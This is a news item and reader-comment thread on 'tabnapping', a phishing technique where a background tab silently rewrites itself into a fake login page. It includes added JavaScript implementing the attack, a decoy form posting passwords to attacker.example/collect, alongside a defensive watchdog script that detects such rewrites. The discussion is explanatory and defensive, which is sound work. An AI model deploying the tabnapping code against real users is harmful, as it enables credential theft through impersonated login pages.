Tabnapping Scams Around the Corner?
scamdetect pointed us to an interesting bit of news about a new security risk called tabnapping, recently outlined by Aza Raskin. The short story is that a page sitting in a background tab waits until you have looked away, then rewrites its own title, favicon and content into a login form impersonating some other site you are likely to be signed in to (Raskin's demo used Gmail), with the form itself hosted by a helpful third party primarily interested in your password. The address bar still shows the original URL, which is the one thing the page cannot forge. (CT: Original writeup removed at request of submitter)
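To make the mechanism concrete, here is an added example (written for this page, not Raskin's demo code and not from the submitter's writeup) of the timing logic such a page uses: note when the tab loses visibility, wait out a delay so the user has moved on, then swap the title, favicon and body. The decoy content, the `attacker.example` host and the "Example Mail" brand are all placeholders. The scheduling is kept in a small class with no DOM dependency so it can be exercised outside a browser; the browser wiring at the bottom only runs when a `document` exists.

```javascript
// Constructed decoy (placeholder brand and host, assumed hostile); the form
// posts to the attacker, not to any real mail provider.
const DECOY = {
  title: 'Sign in - Example Mail',
  favicon: 'https://attacker.example/assets/examplemail.ico',
  html: '<form method="post" action="https://attacker.example/collect">' +
        '<label>Email <input name="user"></label>' +
        '<label>Password <input name="pass" type="password"></label>' +
        '<button>Sign in</button></form>',
};

// Decides *when* to rewrite the page: only after the tab has been hidden for
// delayMs without the user coming back, and only once.
class Tabnabber {
  constructor(delayMs) {
    this.delayMs = delayMs;
    this.hiddenAt = null;   // timestamp (ms) when the tab went hidden
    this.swapped = false;
  }
  // Tab lost focus / became hidden at time `now`.
  onHide(now) { if (this.hiddenAt === null) this.hiddenAt = now; }
  // User came back before the delay elapsed: abort so no half-changed page is seen.
  onShow() { if (!this.swapped) this.hiddenAt = null; }
  // Poll from a timer; returns true exactly once, when the swap should happen.
  shouldSwap(now) {
    if (this.swapped || this.hiddenAt === null) return false;
    if (now - this.hiddenAt < this.delayMs) return false;
    this.swapped = true;
    return true;
  }
}

// Rewrites a document-like object in place: title, favicon link, body.
// location.href is deliberately untouched; the page cannot change it.
function applyDecoy(doc, decoy) {
  doc.title = decoy.title;
  let link = doc.querySelector('link[rel~="icon"]');
  if (!link) {
    link = doc.createElement('link');
    link.rel = 'icon';
    doc.head.appendChild(link);
  }
  link.href = decoy.favicon;
  doc.body.innerHTML = decoy.html;
  return doc;
}

// Browser wiring (skipped under Node). Raskin's demo hooked window.onblur;
// the Page Visibility API is the equivalent signal in current browsers.
if (typeof document !== 'undefined') {
  const nab = new Tabnabber(10000);   // assumed 10 s delay
  document.addEventListener('visibilitychange', () => {
    if (document.hidden) nab.onHide(Date.now()); else nab.onShow();
  });
  setInterval(() => {
    if (nab.shouldSwap(Date.now())) applyDecoy(document, DECOY);
  }, 500);
}
```

The point of the `onShow` cancellation is that the swap is never witnessed: the user only ever sees the page in one of its two stable states, which is why the tab title and favicon, rather than the URL, end up being what people trust.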
Obviously, this won't subvert SSL certs or anything; but studies consistently demonstrate that users oscillate between "don't know" and "don't care" about those, so that isn't much comfort.
And, since pages reloading themselves, or even forwarding to a different domain and URL entirely, after a delay is fairly common (if generally annoying) in a wide variety of legitimate applications, you can't really just break the ability to do that. Sure, you could add it as an advanced option somewhere, or get it largely for free with the right NoScript settings; but there is no way you can break it by default.
You pretty much just fall back on the phishing filter, which is a lame, AV-esque "solution". This would seem to apply to all tabbed browsers, as well.
Maybe it is time for the browsers to take matters more seriously and block any scripts from running in tabs that are not currently in focus.
But this can be done in separate windows too, not just in tabs. In terms of whether this is a new concept, let's just say that I 'saw' this done 10 years ago to gain access to some chat accounts.
You can't handle the truth.
P.T. Barnum, expert applied scamologist, is said to have observed that you can "fool some of the people all of the time and all of the people some of the time."
Arguably, that will be the case here. Your basic clueless noobtard will click on just about anything that looks vaguely plausible, and a lot of stuff that doesn't. This technique will be overkill for them, since straight phishing still works just fine.
Your competent power user, on the other hand, may not fall for the trivial cases (two or three tabs, "innocuous-linkfarm.typosquatter.com" changes into "evil.ath.cx/yourbankherereallyhonestly.html" in front of your eyes); but they are the ones most likely to have 10 firefox windows open, each with 20 or 30 tabs, possibly on multiple monitors. Unless you possess an inhuman ability to maintain state tables in your head, you could easily assume that "yourbank.scam.com" on browser window 5, tab 15, is the "yourbank.com" that you actually did open, on browser window 7, tab 19. That'd be a totally understandable mistake, some percentage of the time, especially if you were tired, distracted, multitasking, or getting sauced enough to face a legacy refactoring project.
Again, tab-related trickery is of no particular use against SSL and cert validation, so the clueful user could detect it that way (unless combined with some attack on SSL, the browser's implementation of it, or the integrity of a trusted certificate authority); but there is no particular reason to suspect that any but the most paranoid user would detect the tab-substitution attack itself.
You see this, and think "Why didn't someone think about this before?"
Tab Mix Plus has had locked tabs for a while now. I'm not entirely sure if this fixes the issue of tabnapping, but it looks like it might.
"Our country is not nearly so overrun with the bigoted as it is overrun with the broadminded." -Archbishop Fulton Sheen
So his "exploit" is to wait until you are away from HIS tab and then alter HIS tab to look like it is a different site.
Exactly ... but if the 'fake' site checks your browser history for the specific fake login screens they have in their repertoire then they can show one that you have used recently.
Even if the scripts are completely disabled on the page, what about a delayed HTTP response, in effect a push to the browser by a server, done some time after the page is loaded, as a delayed response to the original browser request?
It's really hard to avoid all possible scenarios on how a page can be changed from something to something else.
You can't handle the truth.
I bank with HSBC, which is by no means a little no-name bank, and they let me log in with just typed credentials (account details and three digits of a 6-9 digit PIN). I wish they'd back this up with some kind of dongle authentication, like other banks, but their answer is to have me install some rubbish plugin if I want added security, which I can't always do if I'm using different machines, working off site, etc., so I have little choice (other than the hassle of changing banks) than to accept their requirements. I have taken to using the on-screen keyboard so that I can enter with mouse clicks rather than keypresses if I'm on an untrusted machine, but other than that I can't do much else.
It seems to me that online security is being loosened rather than tightened, in the name of providing more freedom to users (in other words, just not making them jump through a couple more hoops to protect their life savings) - simple text entry, banking on mobile phones, isn't all this just asking for trouble? Ten years ago I could create one-time debit/credit card accounts with a fixed maximum, or that expired after X payments, or that could only be charged by client Y, etc., and yet I have a hard time finding any of that from the major banks today.
user actually changed tab?
window.onblur()
Being somebody who has 20-30 tabs up and running, along with massive tab switching, I can't see how I would not spot that it's been forcefully reloaded and is wrong.
Do you know for certain, without looking, what is in tab #8 right this instant? If you had to look, then if you didn't read the exact URL you just lost. If you didn't have to look or you looked at the URL instead of just the title or the icon on the tab, then you would realize that tab #8 was wrong and you would be immune.
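The check the comment above describes (read the real URL, not the title or icon) is exactly what a browser could automate. The following is an added example, not code from the thread, from Tab Mix Plus or from any shipping extension, of a watchdog that an extension or userscript could run in every tab: it snapshots title, favicon and whether a password field exists when the tab goes hidden, compares on return, and anchors the warning to `location.hostname`, which page script cannot rewrite. The `.example` hostnames in the usage are constructed; the warning banner is an assumed, minimal UI.

```javascript
// Capture what the user would see in the tab strip plus whether the page
// currently asks for a password. `loc` is the tab's real location object.
function snapshot(doc, loc) {
  const icon = doc.querySelector('link[rel~="icon"]');
  return {
    hostname: loc.hostname,
    title: doc.title,
    favicon: icon ? icon.href : '',
    hasPasswordField: doc.querySelector('input[type="password"]') !== null,
  };
}

// Compare the state at hide time with the state on return. Returns a list of
// reasons; an empty list means nothing changed behind the user's back.
function tabnabIndicators(atHide, onReturn) {
  const reasons = [];
  if (atHide.hostname !== onReturn.hostname) {
    // A real navigation happened: the address bar reflects it, so this is
    // not a silent in-place rewrite (the thread's legitimate redirect case).
    return reasons;
  }
  if (atHide.title !== onReturn.title) reasons.push('title changed while hidden');
  if (atHide.favicon !== onReturn.favicon) reasons.push('favicon changed while hidden');
  if (!atHide.hasPasswordField && onReturn.hasPasswordField) {
    reasons.push('password field appeared while hidden');
  }
  return reasons;
}

// Browser wiring (skipped under Node): snapshot on hide, check on show.
if (typeof document !== 'undefined') {
  let atHide = null;
  document.addEventListener('visibilitychange', () => {
    if (document.hidden) { atHide = snapshot(document, location); return; }
    if (atHide === null) return;
    const reasons = tabnabIndicators(atHide, snapshot(document, location));
    atHide = null;
    if (reasons.length === 0) return;
    // Assumed UI: a banner naming the origin the user is actually on.
    const bar = document.createElement('div');
    bar.textContent = 'Warning: this tab changed while you were away (' +
      reasons.join('; ') + '). You are actually on ' + location.hostname + '.';
    bar.style.cssText = 'position:fixed;top:0;left:0;right:0;background:#c00;' +
      'color:#fff;padding:8px;z-index:2147483647';
    document.body.prepend(bar);
  });
}
```

A page that reloads itself or forwards elsewhere, the legitimate behaviour the first comment says cannot be broken, starts a fresh script with no `atHide` snapshot and trips nothing; a same-document rewrite into a login form trips all three indicators.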
I think the majority of people would fall for it, even if they only had three or four tabs open instead of 20-30.
If I have been able to see further than others, it is because I bought a pair of binoculars.